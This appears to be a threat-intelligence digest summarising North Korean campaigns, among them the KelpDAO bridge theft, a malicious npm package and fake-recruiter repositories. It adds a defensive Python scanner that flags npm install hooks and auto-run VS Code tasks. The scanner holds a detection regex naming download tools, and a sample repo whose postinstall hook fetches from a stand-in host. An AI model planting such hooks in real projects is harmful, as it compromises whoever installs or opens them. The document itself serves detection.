Lazarus Group’s TraderTraitor cluster is preliminarily linked to a $292M KelpDAO rsETH bridge exploit that abused a 1-of-1 LayerZero DVN setup rather than a smart contract flaw. The attacker allegedly poisoned RPC infrastructure used by LayerZero’s DVN, f…
Malicious `js-logger-pack` versions used an npm `postinstall` script to download cross-platform `MicrosoftSystem64` Node SEA implants from Hugging Face, giving the operator persistent access on Windows, macOS, and Linux. The implant connects to `195.201.1…
The excerpt traces laundering after a reported North Korean theft of $292 million from Kelp DAO, describing pre-funded Tornado Cash wallets, cross-chain gas preparation, and a forged LayerZero message that released 116,500 rsETH. The actor rapidly convert…
A developer describes a highly polished fake recruiting process that used a realistic company website, apparent HR and engineering interviews, and a coding challenge to persuade the victim to run a supplied repository. The visible repo appeared clean, but…
The archived driver analysis alleges that North Korea’s Lazarus Group has weaponized the same class of Microsoft-signed OEM kernel driver weakness discussed in the post. The cited Dell WDTKernel.sys driver exposes 47 privileged commands without access con…
Attackers linked by LayerZero to DPRK Lazarus Group's TraderTraitor stole about $292 million in rsETH from KelpDAO's LayerZero bridge on April 18, 2026. The operation targeted off-chain verification infrastructure, compromising LayerZero-hosted RPC nodes …
Expel tracks HexagonalRodent as a high-confidence DPRK state-sponsored cluster focused on stealing cryptocurrency and NFTs from Web3 developers. The group uses fake job offers and coding assessments that are backdoored through VSCode tasks.json run-on-fol…
Team Cymru examines infrastructure tied to DPRK-linked fake IT worker activity after ZachXBT connected luckyguys[.]site to related cryptocurrency payments. The domain resolved to 163.245.219[.]19, where network telemetry showed concentrated Astrill, Mullv…
QuillAudits frames Lazarus Group's cryptocurrency theft as an industrialized DPRK state capability, estimating more than $7.5 billion stolen through social engineering, insider-style access, UI poisoning, laundering infrastructure, and off-chain verificat…
Arkham tracked the suspected Lazarus Group-linked KelpDAO attacker moving 76,000 ETH, worth about $175 million, from the $292 million theft into new on-chain addresses. The movement followed containment on Arbitrum, where about $71 million in stolen ETH l…
Breakglass Intelligence attributes 158.247.210.58, a Vultr Seoul VPS, to the same Kimsuky-aligned infrastructure cluster as two previously documented Vultr Seoul systems. Passive DNS showed more than 60 domains over an 18-month window, with 31 still resol…
Trend Micro found Void Dokkaebi, also tracked as Famous Chollima, turning fake recruiter interviews into a worm-like supply chain campaign against software developers. Victims are lured into cloning repositories that abuse VS Code folder-open tasks, and c…
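The `js-logger-pack` entry and the two recruiter-lure entries (Expel's HexagonalRodent and Trend Micro's Void Dokkaebi) describe the same class of trap: a repository or package that runs attacker code the moment it is installed or opened, through an npm lifecycle script or a VS Code task with `runOn: folderOpen`. The script below is an added example, not code from Expel, Trend Micro or any project named on this page. It triages a checked-out folder before anyone runs `npm install` or opens it in an editor; the indicator patterns, the sample repository it builds under a temporary directory, and the `example.invalid` URL are constructed for the demonstration.

```python
"""
Added pre-install triage for a cloned repository. Flags:
  * npm lifecycle scripts (preinstall/install/postinstall/prepare) and marks
    them "high" when they fetch or execute code;
  * .vscode/tasks.json entries configured with runOptions.runOn == "folderOpen".
Indicator regex and sample repo contents are constructed for this example.
"""
import json
import os
import re
import tempfile
from typing import List, Tuple

LIFECYCLE = ("preinstall", "install", "postinstall", "prepare", "prepublish")
SUSPICIOUS = re.compile(
    r"(curl|wget|https?://|node\s+-e|eval\(|base64|Invoke-WebRequest|\.exe\b|chmod\s+\+x)",
    re.IGNORECASE,
)

Finding = Tuple[str, str, str]  # (path, severity, detail)


def _load_json_lenient(path: str) -> dict:
    """tasks.json is JSONC; fall back to dropping whole-line // comments and trailing commas."""
    with open(path, encoding="utf-8") as fh:
        text = fh.read()
    try:
        return json.loads(text)
    except json.JSONDecodeError:
        stripped = "\n".join(l for l in text.splitlines() if not l.strip().startswith("//"))
        stripped = re.sub(r",(\s*[}\]])", r"\1", stripped)
        return json.loads(stripped)


def scan_package_json(path: str) -> List[Finding]:
    findings = []
    for hook, cmd in (_load_json_lenient(path).get("scripts") or {}).items():
        if hook in LIFECYCLE:
            severity = "high" if SUSPICIOUS.search(cmd) else "review"
            findings.append((path, severity, f"{hook}: {cmd}"))
    return findings


def scan_tasks_json(path: str) -> List[Finding]:
    findings = []
    for task in _load_json_lenient(path).get("tasks") or []:
        if (task.get("runOptions") or {}).get("runOn") == "folderOpen":
            cmd = " ".join([task.get("command", "")] + list(task.get("args") or []))
            findings.append((path, "high", f"folderOpen task '{task.get('label')}': {cmd.strip()}"))
    return findings


def scan_repo(root: str) -> List[Finding]:
    findings: List[Finding] = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames if d not in ("node_modules", ".git")]
        for fn in filenames:
            full = os.path.join(dirpath, fn)
            if fn == "package.json":
                findings.extend(scan_package_json(full))
            elif fn == "tasks.json" and os.path.basename(dirpath) == ".vscode":
                findings.extend(scan_tasks_json(full))
    return findings


def build_sample_repo() -> str:
    """Constructed 'coding challenge' repo carrying both traps (not a real sample)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, ".vscode"))
    with open(os.path.join(root, "package.json"), "w", encoding="utf-8") as fh:
        json.dump({"name": "coding-challenge", "scripts": {
            "test": "jest",
            "postinstall": "node -e \"require('https').get('https://example.invalid/x')\"",
        }}, fh)
    with open(os.path.join(root, ".vscode", "tasks.json"), "w", encoding="utf-8") as fh:
        fh.write('{\n  // runs the moment the folder is opened\n  "version": "2.0.0",\n'
                 '  "tasks": [{"label": "setup", "type": "shell", "command": "node",\n'
                 '    "args": ["scripts/setup.js"], "runOptions": {"runOn": "folderOpen"}}]\n}')
    return root


def demo() -> List[Finding]:
    return scan_repo(build_sample_repo())


if __name__ == "__main__":
    for path, severity, detail in demo():
        print(f"[{severity}] {path}: {detail}")
```

Run it against the clone before `npm install` and before opening the folder: VS Code only runs a `folderOpen` task after the workspace is trusted, so the check belongs ahead of the trust prompt, and `npm install --ignore-scripts` is the safe way to pull dependencies while the lifecycle scripts are reviewed.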
Microsoft describes how Jasper Sleet, a North Korea-aligned fraudulent IT worker operation, exploits remote hiring workflows to gain trusted organizational access. The actors use stolen or fabricated identities, AI-assisted personas, and role-specific app…
ANY.RUN attributes an active ClickFix-style macOS campaign to Lazarus Group, with fake meeting lures delivered through Telegram and impersonated Zoom, Teams, or Google Meet pages. Victims are instructed to run terminal commands that install the Go-based M…
SlowMist frames the Kelp DAO rsETH and LayerZero incident as a cascading DeFi failure involving liquid restaking tokens, cross-chain bridge verification, and lending-protocol collateral assumptions. The interview says LayerZero attributed the attack to La…